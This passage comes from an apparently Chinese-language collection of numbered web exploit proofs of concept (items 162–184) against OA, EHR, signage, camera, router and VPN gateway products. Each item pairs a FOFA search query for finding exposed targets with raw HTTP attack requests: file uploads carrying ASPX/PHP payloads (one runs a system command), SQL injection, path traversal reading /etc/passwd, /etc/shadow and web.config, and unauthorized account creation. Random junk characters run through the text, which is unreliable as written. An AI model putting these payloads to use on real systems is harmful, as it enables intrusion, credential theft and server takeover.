# L' d6 M: G' y2 f4 T+ ?5 s9 A8 Lxmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">4 r P9 ?' t. m; ]/ C- f
<soap:Body>
0 G2 Q6 ^- z& S<UploadResume xmlns="http://tempuri.org/">- L, L! a7 J# ?* R( H) k
<ip>1</ip>
- k- h a7 ~0 Q, T# A/ m* K<fileName>../../../../dizxdell.aspx</fileName>
% k9 V! R' K) [9 o3 [7 i<fileFlow>andqbmFnc3phc3d1ZGh0bmhwYXc=</fileFlow>
+ c% Q, Q0 Z! X; ]. p) a- @<tag>3</tag>
* ~; F3 ]% o0 T! _</UploadResume>
b! Z. P2 k. M( j</soap:Body>4 @, i+ S) n- G* X4 ~2 T! y) Z- H
</soap:Envelope>
4 ~: W6 s6 e% T- f! W
+ ]/ K. y% L) f1 Q& t8 x3 a8 ~! _$ H0 y# ?$ k3 z+ o
http://x.x.x.x/dizxdell.aspx
' P* T- f. t8 ~
+ _3 g1 N& P+ Z) r Q' M3 p162. 和丰多媒体信息发布系统 QH.aspx 任意文件上传; e" T, C+ y5 U* N' |) z
FOFA: app="和丰山海-数字标牌", |& {# x' |/ r4 I
POST /QH.aspx HTTP/1.1: P p3 _/ U8 r0 B: Y
Host: x.x.x.x
% {) J4 e# R" \' n1 p3 N( j3 uUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
$ B t: U$ X, z. a8 m$ n% P' ^2 FConnection: close- E2 A! @6 `, d
Content-Length: 583
( P: R/ |) w; \4 B7 F3 PContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryeegvclmyurlotuey
7 R6 X& V( L/ O, k* hAccept-Encoding: gzip
- ?5 ]5 J8 g0 ]. Y% w# I+ V0 ?3 j: [
------WebKitFormBoundaryeegvclmyurlotuey0 G, K& }0 ~- e4 r! ~5 t! T! a( G
Content-Disposition: form-data; name="fileToUpload"; filename="kjuhitjgk.aspx"
" K4 h8 N/ e' h: {, r3 kContent-Type: application/octet-stream+ s9 ]! C& q3 d! B
% a1 [/ @ Z" o, m& E3 y
<% response.write("ujidwqfuuqjalgkvrpqy") %>& Z+ i+ G' g- V5 [+ I& ]
------WebKitFormBoundaryeegvclmyurlotuey
9 d1 f' i0 g+ j m1 y" [8 JContent-Disposition: form-data; name="action"& Q7 c' W( M& P; b9 E& Q
4 v! g& o% p5 i& b3 aupload
) b2 F8 P7 Z5 A( U/ d0 g* |------WebKitFormBoundaryeegvclmyurlotuey
/ Y0 i' z; [, |2 n2 C1 K' OContent-Disposition: form-data; name="responderId"/ Y& w+ p8 D# r$ R1 g
+ X: g N. U( D4 j3 R) ~6 ZResourceNewResponder1 }5 p( U" ]9 h
------WebKitFormBoundaryeegvclmyurlotuey
& r3 O1 {4 E! PContent-Disposition: form-data; name="remotePath"
. v- n( _$ k; A+ c5 S1 D) Q$ c
! h: O U6 }* X/opt/resources* |9 H& U: A: {3 Q! o
------WebKitFormBoundaryeegvclmyurlotuey--9 M' Y: S. a! C! _' ]
8 ~* n' {, O1 P. }+ }% I2 ~
. I9 j% s$ O( t, f) xhttp://x.x.x.x/opt/resources/kjuhitjgk.aspx6 p) N" v- U; f# O$ G# Q! I }- P9 R, d
& A2 y! i1 [( n
163. 号卡极团分销管理系统 ue_serve.php 任意文件上传( Z6 M, ?" u8 s8 @2 q
FOFA: icon_hash="-795291075"
( O% Q% r# |7 ^8 y9 [- @6 a4 fPOST /admin/controller/ue_serve.php?action=image&encode=utf-8 HTTP/1.11 v, v1 b- ?; q# X
Host: x.x.x.x& G3 G' c4 E% l
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
- ?' S X i* H: M$ Z1 z1 fConnection: close
$ y" ~3 w- S/ g( n% U! MContent-Length: 293; f4 B" }1 g4 y6 z6 q
Accept: */*
& q& U+ o8 k2 t b6 ?" {Accept-Encoding: gzip, deflate9 h9 [8 ?9 \$ p. [
Accept-Language: zh-CN,zh;q=0.9
9 M1 m8 j/ H" j: `& u* ?( }Content-Type: multipart/form-data; boundary=----iiqvnofupvhdyrcoqyuujyetjvqgocod
G7 W( Z/ r4 r. s. h7 a4 u
- i: D0 D0 G! f------iiqvnofupvhdyrcoqyuujyetjvqgocod
9 x! g E% f. w4 `7 V4 L1 v: N8 zContent-Disposition: form-data; name="name"
3 y, o5 G; L( }" @8 z: Y. j2 w$ q
A" h7 Z7 Z/ D5 L* s1.php' ^# Q& ?: D' t% K8 @
------iiqvnofupvhdyrcoqyuujyetjvqgocod
% I. G$ j+ |3 d- aContent-Disposition: form-data; name="upfile"; filename="1.php". v3 p# d* d* }. E: y" r" x
Content-Type: image/jpeg
. @7 V% d& X9 @7 m& H1 C( p4 H% ]3 c( ?9 K0 Y v, ~' N
rvjhvbhwwuooyiioxega
; u. J/ r, `' q, [8 i; m, w6 p------iiqvnofupvhdyrcoqyuujyetjvqgocod--
3 ]$ j$ e3 b+ J0 w/ S
4 _$ C# N |* P, z/ |
s! n+ x. V! R2 z: f; H' S$ _8 Y164. 慧校园(安校易)管理系统 FileUpProductupdate.aspx 任意文件上传
( a4 f- U9 L! `FOFA: title="智慧综合管理平台登入"% l) B" e' ~! n% d/ j
POST /Module/FileUpPage/FileUpProductupdate.aspx HTTP/1.1; z% m) u2 k9 J4 B0 V1 n
Host: x.x.x.x1 b3 L# ?; v" K" O; j' F3 Q
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
6 G7 J- B$ S) W uContent-Length: 288
u( e$ z3 h* X2 i, v) ^8 iAccept: application/json, text/javascript, */*; q=0.01
5 R0 ^! c2 k( }: |6 X+ K. YAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2,
5 w+ o' q7 _6 {/ dConnection: close
1 x8 b5 A; i0 U; Z# H/ I: B3 oContent-Type: multipart/form-data; boundary=----dqdaieopnozbkapjacdbdthlvtlyl
& O) Q# B4 e) M- qX-Requested-With: XMLHttpRequest9 G; n2 v7 s7 j; M, u/ d
Accept-Encoding: gzip/ C: U& { X. M( h, x# h9 F( j) k
- t3 G8 g! a: ?1 t% ~- ?2 L G1 o6 M
------dqdaieopnozbkapjacdbdthlvtlyl3 p0 V8 m' P& ?5 h7 B8 d* C
Content-Disposition: form-data; name="Filedata"; filename="qaz.aspx"
7 f2 I: y3 z( X( E/ j$ L" kContent-Type: image/jpeg
$ D1 A0 h. h5 n2 c* t& y# _' L" b) D6 X8 `2 k& b9 u" e+ @$ p
<%@Page Language="C#"%><%Response.Write("aitwpovoxwtgixpfqiys");System.IO.File.Delete(Request.PhysicalPath);%>
9 u8 p5 t5 r0 K8 C, ~------dqdaieopnozbkapjacdbdthlvtlyl--' O$ }8 B5 e: g7 g
! @6 _. s! U' _* f+ R. B
' W' W- x! ~6 @1 `/ fhttp://x.x.x.x/Upload/Publish/000000/0_0_0_0/update.aspx
- p2 D; }6 Y0 G# ~
* k/ ^0 P5 d( [165. OrangeHRM 3.3.3 SQL 注入5 O6 q2 l8 h7 n# [ _! s3 E' r6 k5 p
CVE-2024-364285 k. F7 k. r' _9 D3 }% h
FOFA: app="OrangeHRM-产品"7 X- s' l9 g; u0 M" z
URL:https://192.168.1.28/symfony/web ... e&sortOrder=ASC,(SELECT (CASE WHEN (5240=5240) THEN 1 ELSE 5240*(SELECT 5240 FROM INFORMATION_SCHEMA.PLUGINS) END))9 Y% O3 w# N" W; j/ P: G( G; v
% ^0 z; T8 Q3 f3 t, L8 D
4 n h2 P6 I# ^+ y
166. 中成科信票务管理平台SeatMapHandler SQL注入4 s/ P7 u8 G0 F' L! P# E7 b% c
FOFA:body="技术支持:北京中成科信科技发展有限公司"! U0 W M6 G0 j, L% q0 [
POST /SystemManager/Comm/SeatMapHandler.ashx HTTP/1.11 R$ ^2 m) S, K- J z
Host:' _& D4 `5 V9 |
Pragma: no-cache; q6 k+ b$ x" u( {1 M$ w
Cache-Control: no-cache
, M+ _9 e9 _7 x/ UUpgrade-Insecure-Requests: 1
0 {/ O0 V. I3 E' D) _* }* kUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36* g- o& v, o4 N: `$ w
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
( o9 t3 g3 ~- ]6 w) _Accept-Encoding: gzip, deflate( A' m- G, F; @7 l
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
! n8 N0 Q* O1 k; T" R( xCookie: ASPSESSIONIDCCRBRCTD=LHLBDIBAKDEGBCJGKIKMNODE6 ~; u+ z& j3 G; L- q/ f" P3 C
Connection: close
+ Y* \$ }% T3 \Content-Type: application/x-www-form-urlencoded
8 L% ^+ ~+ X, k! hContent-Length: 89( F; b6 I; l! Z5 j* M
: K# y7 {% F9 m0 u" d# h8 NMethod=GetZoneInfo&solutionNo=%27+AND+4172+IN+%28SELECT+%28CHAR%28104%29%2BCHAR%28101%29%2BCHAR%28108%29%2BCHAR%28108%29%2BCHAR%28111%29%29%29--+bErE
7 `2 C! Y( c) v% r; l' m K
. o0 r9 f1 V; g- ~" p3 R6 p- S
$ V: Y& s% i% R( g167. 精益价值管理系统 DownLoad.aspx任意文件读取
* h$ U c" t& b, N) SFOFA:body="/ajax/LVS.Core.Common.STSResult,LVS.Core.Common.ashx"
: K; B3 b/ e1 c/ D% Z) zGET /Business/DownLoad.aspx?p=UploadFile/../Web.Config HTTP/1.17 [2 @, R* j* m+ i
Host:" X; C1 h/ w3 ]% }9 W% g' D
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.364 E+ [) n" e4 I* a% y. E: g3 `
Content-Type: application/x-www-form-urlencoded
: H6 L5 f- @# B$ R! `. mAccept-Encoding: gzip, deflate8 Z, F& F$ J/ y8 m5 T0 D
Accept: */*
; Y0 H: N+ e3 c* p" @: @3 _Connection: keep-alive
; V# [' [" q/ X7 G# D+ B( G2 U' A& d, a& a: T$ O) ]$ h
9 V0 h% q/ N) l& V' p
168. 宏景EHR OutputCode 任意文件读取2 {5 |3 a1 W% w% `: L% \" j+ G, G
FOFA:app="HJSOFT-HCM"
9 {- p7 V- {# q4 O: A* y$ A6 oGET /servlet/OutputCode?path=VHmj0PAATTP2HJBPAATTPcyRcHb6hPAATTP2HJFPAATTP59XObqwUZaPAATTP2HJBPAATTP6EvXjT HTTP/1.12 y$ A2 z9 d& x1 |* V- G$ j+ ~
Host: your-ip# W1 n X5 ~! K
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36
/ }, G8 ~0 g- u6 t4 A6 z$ r" NContent-Type: application/x-www-form-urlencoded
) A& [6 d) d: j; z; n+ RConnection: close4 T% q4 B+ E. s; n4 T5 {
0 J0 ^. H! z8 C/ b: t* J
2 Z1 {5 e D& c* E
& X1 s: X, ^9 G( w; b1 H169. 宏景EHR downlawbase SQL注入3 ^+ o4 `% r8 Q. d4 b
FOFA:app="HJSOFT-HCM"
9 ^: r" ] M* {8 P0 C3 {3 HGET /templates/attestation/../../selfservice/lawbase/downlawbase?id=1';WAITFOR+DELAY+'0:0:5'--+ HTTP/1.1
8 Y5 X ?8 [: ^5 o& d- \Host: your-ip
% o% V/ [- w; U$ |7 V+ mUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36% L1 c N; T q3 x
Accept: */*
1 K4 I2 `& Q" s4 BAccept-Encoding: gzip, deflate
~, D2 R: I1 a3 QConnection: close
+ `8 R1 Q" P' _: h ^6 U4 F' n% m+ S& ]! ?$ x
" S5 ^% j1 g' ~. p3 |! e9 N! L7 k- N
170. 宏景EHR DisplayExcelCustomReport 任意文件读取
* m- ]/ h+ n5 k% pFOFA:body="/general/sys/hjaxmanage.js"* |% q ], J# F- h( f, O% u1 l
POST /templates/attestation/../../servlet/DisplayExcelCustomReport HTTP/1.12 a. B$ s* F+ d* T. r8 ~7 {
Host: balalanengliang
% M6 d% c; W" w' CUser-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
' R6 |# y* z4 D; fContent-Type: application/x-www-form-urlencoded& w$ _3 v) a$ z2 O1 o
" v8 S8 r2 @' r Q: j) R
filename=../webapps/ROOT/WEB-INF/web.xml# A; s% M# X3 t8 G2 D* l) D
V! c' z3 A$ K8 [& E
) k) n8 O* W# E" {2 K0 h" N# [! \171. 通天星CMSV6车载定位监控平台 SQL注入
8 ?4 i' {# f; ?9 gFOFA:body="/808gps/"
# v! q4 |8 _7 i0 M9 s, `GET /run_stop/delete.do;downloadLogger.action?ids=1)+AND+(SELECT+5394+FROM+(SELECT(SLEEP(5)))tdpw)--+&loadAll=1 HTTP/1.1
0 X3 e& h' H/ u4 N5 k8 f* t6 u6 n9 CHost: your-ip
7 U: h/ R7 [8 Y' Y. B7 H3 {User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
" ]" s$ B6 b+ g$ N" _Accept: */*
q/ h1 w, s" d5 e/ r+ F" T0 vAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2( n6 F5 x3 d3 b6 c
Accept-Encoding: gzip, deflate% c. `# v Z3 J8 ]4 y
Connection: close
7 r9 [8 b7 W! b- U$ Z; n3 E3 W* [( b
- N9 E K8 { Z- ], ?+ H
1 E0 R C3 t- o( S172. DT-高清车牌识别摄像机任意文件读取
2 W6 |! v- [0 t1 B* c4 GFOFA:app="DT-高清车牌识别摄像机") o L- j0 j' x: s$ ]
GET /../../../../etc/passwd HTTP/1.1
& l: @8 G" K( Q* PHost: your-ip
0 T4 j3 I* U: L$ b5 CUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
2 X* M! p& E. w* v; bAccept-Encoding: gzip, deflate
# ]: b# a0 {7 pAccept: */*
; D% y1 H; r% E. C t3 JConnection: keep-alive. T" N; q" M# K+ N8 c" c* U
& y, k* N8 ^5 n, m: f$ g
5 e6 g& Z |3 d7 c+ Z; _. _
- G& I5 |. U# r2 a' _/ D173. Check Point 安全网关任意文件读取
& S) t. j0 |0 FCVE-2024-24919
7 Q" W4 h4 a1 A: \% Q' QFOFA:app="Check_Point-SSL-Network-Extender"
- t- P- f& {7 tPOST /clients/MyCRL HTTP/1.13 _0 l. \& g& Y; {. c# t( u: [* d
Host: your-ip
6 {1 V5 c Y- U, l. Z* cContent-Type: application/x-www-form-urlencoded" C& @7 {/ V$ g5 D
7 m2 ~' n/ M9 U' h( \* k7 j
aCSHELL/../../../../../../../etc/shadow5 Z' Y7 R a6 K4 @% P" a5 J" _! N
0 g8 A& `' P' M# ~# `
5 J; D) K* W8 ?; f$ v: D
. b+ r# F x! O' ]9 e
174. 金和OA C6 FileDownLoad.aspx 任意文件读取
+ y$ g5 T" Q8 K( W& KFOFA:app="金和网络-金和OA"* i% S H8 p, {
GET /c6/JHSoft.Web.CustomQuery/FileDownLoad.aspx?FilePath=../Resource/JHFileConfig.ini HTTP/1.1* \7 n$ ?: k2 f/ @2 p
Host: your-ip
5 X1 p8 m2 d* C: ]2 NUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
( `* c* m0 N* j' c8 C/ \# lAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
: r: @0 l: h# E6 n) pAccept-Encoding: gzip, deflate, br
1 f1 G+ ~0 X& E% y* F2 o8 ~Accept-Language: zh-CN,zh;q=0.9
1 b; O, M' P. l, b2 QConnection: close, C/ r$ C5 R1 w! f
& f* y4 n7 E. c, h7 H* x4 P$ h
+ r/ h- ]: C: i9 Q: m
8 H3 t& {0 w3 \* N- H! P2 }
175. 金和OA C6 IncentivePlanFulfill.aspx SQL注入
8 h+ u4 }. T& _0 v0 tFOFA:app="金和网络-金和OA". i: m8 X3 ` y4 j; u4 B
GET /C6/JHSoft.Web.IncentivePlan/IncentivePlanFulfill.aspx/?IncentiveID=1%20WAITFOR%20DELAY%20'0:0:5'--&TVersion=1 HTTP/1.1
2 ^0 b. M7 @9 A0 L' _7 P2 |Host:
9 v. q9 d3 }9 k; KUser-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
+ s& v. E* K5 D: L; bAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.81 O* X _: \9 l& G- V2 r
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2. c& W: S% Q9 d0 z- {5 x1 X
Accept-Encoding: gzip, deflate
, V3 l) m, W/ q6 ZConnection: close5 ?0 L0 V1 s X1 |+ V
Upgrade-Insecure-Requests: 1
0 Y: ]3 C( e! j0 l+ e u5 G- e& \0 p3 k% _0 b
! e6 j1 a( |5 U; g
176. 电信网关配置管理系统 rewrite.php 文件上传
# S+ f* ~1 d# c* I, ^/ h& P HFOFA:body="img/login_bg3.png" && body="系统登录"& [8 }; }, I9 H3 i% E" @
POST /manager/teletext/material/rewrite.php HTTP/1.1
& J" m7 R' _0 |! B0 rHost: your-ip
% I7 H& ~* C1 oUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
2 g/ I4 y* M" I1 ~Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryOKldnDPT
3 P7 O/ c7 p9 b2 ?Connection: close
1 s# V, k% ^ z7 I0 q' {& t
& Y- f) O1 l0 B' z' O- b1 ^------WebKitFormBoundaryOKldnDPT
- F0 ?# }( ]3 C2 {) h8 hContent-Disposition: form-data; name="tmp_name"; filename="test.php"9 G* [/ T" h2 E1 ^
Content-Type: image/png2 b. T; p; u/ u" d
P2 o" K8 g6 a& ]
<?php system("cat /etc/passwd");unlink(__FILE__);?>
& K Z) B5 ^6 R) d. R$ x$ Y------WebKitFormBoundaryOKldnDPT
6 a7 \" v% M) T9 T' eContent-Disposition: form-data; name="uploadtime"6 }" y( {, g+ M
6 q6 _) @$ e$ C) |. _
' t1 Z* g" @% N* n8 ^
------WebKitFormBoundaryOKldnDPT--
9 p* [" f N6 {- Q3 m3 Q5 q
/ l6 O! w# `4 l5 n$ V: {
6 ?1 z1 `1 v( r' c' `
9 s/ K9 {& `6 h4 Q1 ]177. H3C路由器敏感信息泄露! Y" P, g1 e# D$ Z& B: I+ T
/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg
: F3 D" r5 ?/ w1 F/userLogin.asp/../actionpolicy_status/../M60.cfg
* N5 N2 U9 N# N3 _ M/userLogin.asp/../actionpolicy_status/../GR8300.cfg
? i5 a- v+ V- e. D/ J0 u4 ]/userLogin.asp/../actionpolicy_status/../GR5200.cfg1 o5 e7 v: O* V
/userLogin.asp/../actionpolicy_status/../GR3200.cfg
3 N8 w |' X, A, @! D" y/userLogin.asp/../actionpolicy_status/../GR2200.cfg. a8 F$ w# W2 V- C8 C$ H& O: T
/userLogin.asp/../actionpolicy_status/../ER8300G2-X.cfg
% t; o9 a' i- r5 c* C) T3 {/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg4 M6 N. B7 z3 T' ^6 g
/userLogin.asp/../actionpolicy_status/../ER6300G2.cfg, W' O0 `4 ^7 s6 u1 ]
/userLogin.asp/../actionpolicy_status/../ER5200G2.cfg( \: Y0 R" I9 u; Q: M
/userLogin.asp/../actionpolicy_status/../ER5200.cfg
% T9 |* x. B' w4 L9 `1 _) O5 Y/userLogin.asp/../actionpolicy_status/../ER5100.cfg9 K# n6 V$ R1 ~% d5 {2 z
/userLogin.asp/../actionpolicy_status/../ER3260G2.cfg
" l) ^. p9 E8 g7 s/userLogin.asp/../actionpolicy_status/../ER3260.cfg
/ k6 ~ [* d2 V6 Z) l/userLogin.asp/../actionpolicy_status/../ER3200G2.cfg
5 C. t/ q+ r( A- t" J/userLogin.asp/../actionpolicy_status/../ER3200.cfg/ J8 d) V0 c/ G& n8 u; M
/userLogin.asp/../actionpolicy_status/../ER3108GW.cfg
9 c0 ]7 E5 `7 e6 w, ]/userLogin.asp/../actionpolicy_status/../ER3108G.cfg0 } z6 M8 ^0 b# |8 u, X
/userLogin.asp/../actionpolicy_status/../ER3100G2.cfg1 h. t1 X2 }, A' d2 w$ `9 C
/userLogin.asp/../actionpolicy_status/../ER3100.cfg7 P) {- N* X: d2 J) f5 l4 K1 {
/userLogin.asp/../actionpolicy_status/../ER2200G2.cfg7 {" R4 n3 j! H3 |% k
1 O5 T: j& F3 T9 O2 U$ q
( V9 |* |# v( |9 o$ b5 O% C- ~178. H3C校园网自助服务系统-flexfileupload-任意文件上传5 p9 q/ N2 |+ h# G% Q5 a
FOFA:header="/selfservice"
- t+ J% p1 q% t* EPOST /imc/primepush/%2e%2e/flexFileUpload HTTP/1.18 G; J2 N! |0 V
Host:
, u' }* g. v! l+ L5 c0 z8 }User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.362 q2 ^# Y* v0 w. n) s
Content-Length: 252
+ D4 b5 d/ C$ ]! {- q G% w7 dAccept-Encoding: gzip, deflate6 E+ T% c1 h- u) Q2 B C8 j2 V
Connection: close' d. _1 D" M m) ?: M+ R
Content-Type: multipart/form-data; boundary=---------------aqutkea7vvanpqy3rh2l( z% @1 F- V" L* O9 D2 k, d# Q
-----------------aqutkea7vvanpqy3rh2l: w* c( y7 I9 D
Content-Disposition: form-data; name="12234.txt"; filename="12234"
9 ^6 [3 p8 x( D$ T5 |! TContent-Type: application/octet-stream
1 f# [) n' r) J/ m0 k* U6 R' e/ u. g) ?Content-Length: 255
9 E; \* G! U' y! n* x
4 s- s6 I! M9 `8 h; V4 M; x2 s12234
8 U7 w: Y1 ], e* i) [-----------------aqutkea7vvanpqy3rh2l--* Z% B, C' E( L% r# \( t: w
: X. D! x5 I3 ] {9 c
# }; F9 |4 M9 Q$ N4 [9 F- FGET /imc/primepush/%2e%2e/flex/12234.txt' ]9 G! X1 t, i
, k1 w4 u. T1 b+ P! k- Y2 F9 J
2 _8 S# c7 k1 P2 X( W179. 建文工程管理系统存在任意文件读取! e4 @3 T _+ ?
POST /Common/DownLoad2.aspx HTTP/1.11 m6 _; c+ V$ q2 Z" p+ B+ x0 {* E! _
Host: {{Hostname}}2 S2 J: N3 \/ V1 k0 x" J4 i
Content-Type: application/x-www-form-urlencoded( v0 b# C8 n. o" Q; D! c
User-Agent: Mozilla/5.0# v7 _' m H# ^1 o
) h( c/ \) V* Q2 ?% D
path=../log4net.config&Name=; Y$ d- p, [3 B& Z% p D4 x
/ r, F; E; {8 Q7 m$ T5 c8 A: O7 z
+ M$ Z- v, e% w T0 n* V% |( J% N180. 帮管客 CRM jiliyu SQL注入% A; R( o' c5 c6 Y+ `! P# p" G0 g
FOFA:app="帮管客-CRM"
5 Z' A9 h4 R6 S/ r* p& `; {GET /index.php/jiliyu?keyword=1&page=1&pai=id&sou=soufast&timedsc=激励语列表&xu=and%201=(updatexml(1,concat(0x7e,(select%20user()),0x7e),1)) HTTP/1.1
/ M7 _0 ^3 Q# MHost: your-ip
6 ^: m% o; Z. o6 [" qUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36; r5 p* } t# j1 f- r5 F( V
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
' Q; L) u8 U5 E7 E& d& W! w$ r- |% l: Z& OAccept-Encoding: gzip, deflate
& z! e0 Z. |6 |$ @/ c/ dAccept-Language: zh-CN,zh;q=0.9
7 Y) E T/ k) tConnection: close/ b3 I- u& t4 T: R3 K! D0 [
. k9 e/ b7 }, b; X) }
- Y+ E* Y3 l+ J2 Y, E
181. 润申信息科技企业标准化管理系统 UpdataLogHandler.ashx SQL注入
3 k0 l; T7 k$ k1 Z9 vFOFA:"PDCA/js/_publicCom.js"
# |- f; h3 B6 Q" V5 g( s4 ^( rPOST /PDCA/ashx/UpdataLogHandler.ashx HTTP/1.15 a9 B8 g4 l+ \: ]# k9 G
Host: your-ip( X- @3 [) U9 c2 j! }: ~2 @
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
' `% x, G8 {$ H$ W9 }" lAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
3 `% w8 U0 f1 X y* k' o6 F: qAccept-Encoding: gzip, deflate, br7 F4 z! c Z4 ~2 a: p4 D
Accept-Language: zh-CN,zh;q=0.9- m7 z6 s/ z. Q: Y/ x5 a: k; L
Connection: close2 H- F, A b+ ]" O
Content-Type: application/x-www-form-urlencoded
6 F9 G# M# X! U8 W, B) \" s
# ~: V2 u4 y) L; s$ x# z; a0 y# }2 _6 _
action=GetAll&start=' WAITFOR DELAY '0:0:5'--&end=&code=11&type=2&page=1&rows=204 s0 F' }4 k0 }+ B i" a
: ]1 X& }, R$ `/ A
6 F3 \& |8 Q2 y& z2 d( P182. 润申科技企业标准化管理系统AddNewsHandler.ashx 任意用户创建: J/ y4 e& K! D
FOFA:"PDCA/js/_publicCom.js"
+ d% W0 v- F$ m! a9 `4 @# {8 W1 JPOST /PDCA/ashx/AddNewsHandler.ashx?action=Adduser HTTP/1.1. E$ w; p3 e8 P$ P4 F
Host: your-ip4 `5 M9 ?. h( ~; G3 l7 C
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
( E; ~$ k" C9 AAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.75 X3 F% I5 E6 U% x
Accept-Encoding: gzip, deflate, br0 }7 j6 T& x: C! q/ w& m Y- [
Accept-Language: zh-CN,zh;q=0.9
: R6 q0 |1 b) O: ^0 s' ^7 yConnection: close
8 L" W. B0 |3 W0 G; R4 W/ `; fContent-Type: application/x-www-form-urlencoded
# G3 y5 R; b; Y3 J; e/ g: T* H+ N1 a" ~
6 M, M% Z7 P b( S, \7 `& q3 m. Cusername=test1234&pwd=test1234&savedays=1
# f6 j+ p+ f7 S+ t& D' H
( t9 B1 E4 Z2 I( X) b( [
& |7 I( I1 o0 U1 D! T: y! J183. 广州图创图书馆集群管理系统 updOpuserPw SQL注入
0 A5 b. O1 d, x3 w: KFOFA:body="interlib/common/" || body="Interlib图书馆集群管理系统" || body="/interlib3/system_index" || body="打开Interlib主界面"$ C6 F, c4 {* e- A% x2 a# _
GET /interlib3/service/sysop/updOpuserPw?loginid=admin11&newpassword=Aa@123456&token=1%27and+ctxsys.drithsx.sn(1,(select%20111111*111111%20from%20dual))=%272 HTTP/1.1
5 ^3 \, k4 c. u9 E; E4 nHost: your-ip/ z- J! i1 B8 W C, |/ W* A( j
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36: g- p; N4 U- n( Y5 y1 o! F" O
Accept-Charset: utf-8: P+ h6 n [5 G. D
Accept-Encoding: gzip, deflate
2 {8 l" ^1 {" I, |Connection: close
. D4 S3 L: T% C% i0 `; y( a5 r, r- d w) y- y
8 f8 z" l, S8 q" D" C# q184. 迅饶科技 X2Modbus 网关 AddUser 任意用户添加8 w T6 R& s+ |) W+ C
FOFA:server="SunFull-Webs"9 B( |/ j+ u q8 S" \( W2 R/ `
POST /soap/AddUser HTTP/1.12 ]+ T6 ?2 s7 b( ^, K/ s
Host: your-ip" `2 O) k6 f. R6 r) \. f1 U$ B' M* c
Accept-Encoding: gzip, deflate- {2 }9 C' w$ K5 E
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
3 z5 m0 O' i0 o+ p9 X& pAccept: application/xml, text/xml, */*; q=0.01( }$ V" |% K; M7 x/ ?! |
Content-Type: text/xml; charset=utf-87 q8 O ~! `0 H! a$ Q3 `) D
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
, W8 v( b' C; P) D7 ^X-Requested-With: XMLHttpRequest5 ^5 ]. Z, N$ `% T/ y4 r5 T o
( f% X, X: J( X9 Y0 E# j1 t& b
